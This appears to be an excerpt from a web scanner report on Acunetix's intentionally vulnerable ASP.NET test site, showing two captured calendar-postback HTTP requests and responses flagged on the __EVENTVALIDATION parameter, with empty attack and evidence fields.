Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1165 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,165 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8550&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgDAxs%2BgYNsIZGRkVGdtRaJu3QMXD17yR40O%2BH4UwZQ%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKLseysBQK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy%2BPoBQLcy%2BPoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7%2F5DwLcy7%2F5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ%2Bg8CsdLZ%2Bg8CsdLNkQcCsdLNkQcCsdKh%2BQUCsdKh%2BQUCsdLVnQ0CsdLVnQ0CivmnBQKK%2BacFAor529kJAor529kJAor5z%2FwCAor5z%2FwCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v%2BAFAor5v%2BAFAor504QNAor504QNAor5h%2BwLAor5h%2BwLAor5u4MDAor5u4MDAr%2BT58QJAr%2BT58QJAr%2BTm5sBAr%2BTm5sBAr%2BTj74KAr%2BTj74KAr%2BTo9UDAr%2BTo9UDAr%2BT1%2BkMAr%2BT1%2BkMAr%2BTy4wEAr%2BTy4wEAr%2BT%2F6MNAr%2BT%2F6MNAr%2BTk8YGAr%2BTk8YGAr%2BTx68DAr%2BTx68DAr%2BT%2B8IMAr%2BT%2B8IMb8oQrObs7Taq2FTLEY4S5Wk2wYo%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:59:33 GMT Content-Length: 12448
Response Body - size: 12,448 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgDAxs+gYNsIZGRkVGdtRaJu3QMXD17yR40O+H4UwZQ=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKLseysBQK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy+PoBQLcy+PoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7/5DwLcy7/5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ+g8CsdLZ+g8CsdLNkQcCsdLNkQcCsdKh+QUCsdKh+QUCsdLVnQ0CsdLVnQ0CivmnBQKK+acFAor529kJAor529kJAor5z/wCAor5z/wCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v+AFAor5v+AFAor504QNAor504QNAor5h+wLAor5h+wLAor5u4MDAor5u4MDAr+T58QJAr+T58QJAr+Tm5sBAr+Tm5sBAr+Tj74KAr+Tj74KAr+To9UDAr+To9UDAr+T1+kMAr+T1+kMAr+Ty4wEAr+Ty4wEAr+T/6MNAr+T/6MNAr+Tk8YGAr+Tk8YGAr+Tx68DAr+Tx68DAr+T+8IMAr+T+8IMb8oQrObs7Taq2FTLEY4S5Wk2wYo=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:White" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8562')" style="color:Black" title="June 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8563')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8564')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8565')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8566')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8567')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8568')" style="color:Black" title="June 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8569')" style="color:Black" title="June 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8570')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8571')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8572')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8573')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8574')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8575')" style="color:Black" title="June 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1125 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,125 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8204&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgBA2Xy9UNoIZGRk0mKyu8iW2K%2FkaKXLYRMop1aCTZE%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKLxdmECwK646%2FsDgKcisLvAQK%2Fk6foDAK%2Fk6foDAK%2Fk9uMBAK%2Fk9uMBAK%2Fk8%2BjDQK%2Fk8%2BjDQK%2Fk%2BPGBgK%2Fk%2BPGBgK%2Fk9evAwK%2Fk9evAwK%2Fk8vCDAK%2Fk8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6%2FSUCkLqR%2BAkCkLqR%2BAkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ%2FJwKAtfZ%2FJwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC%2BKQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w9Opms655h7sQdBneCWHMC8HQLUew%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:35:41 GMT Content-Length: 12444
Response Body - size: 12,444 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgBA2Xy9UNoIZGRk0mKyu8iW2K/kaKXLYRMop1aCTZE=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKLxdmECwK646/sDgKcisLvAQK/k6foDAK/k6foDAK/k9uMBAK/k9uMBAK/k8+jDQK/k8+jDQK/k+PGBgK/k+PGBgK/k9evAwK/k9evAwK/k8vCDAK/k8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6/SUCkLqR+AkCkLqR+AkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ/JwKAtfZ/JwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w9Opms655h7sQdBneCWHMC8HQLUew==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8191')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8192')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8193')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8194')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8195')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8196')" style="color:Black" title="June 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8197')" style="color:Black" title="June 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8198')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8199')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8200')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8201')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8202')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8203')" style="color:Black" title="June 17">17</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8204')" style="color:White" title="June 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8205')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8206')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8207')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8208')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8209')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8210')" style="color:Black" title="June 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8211')" style="color:Black" title="June 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
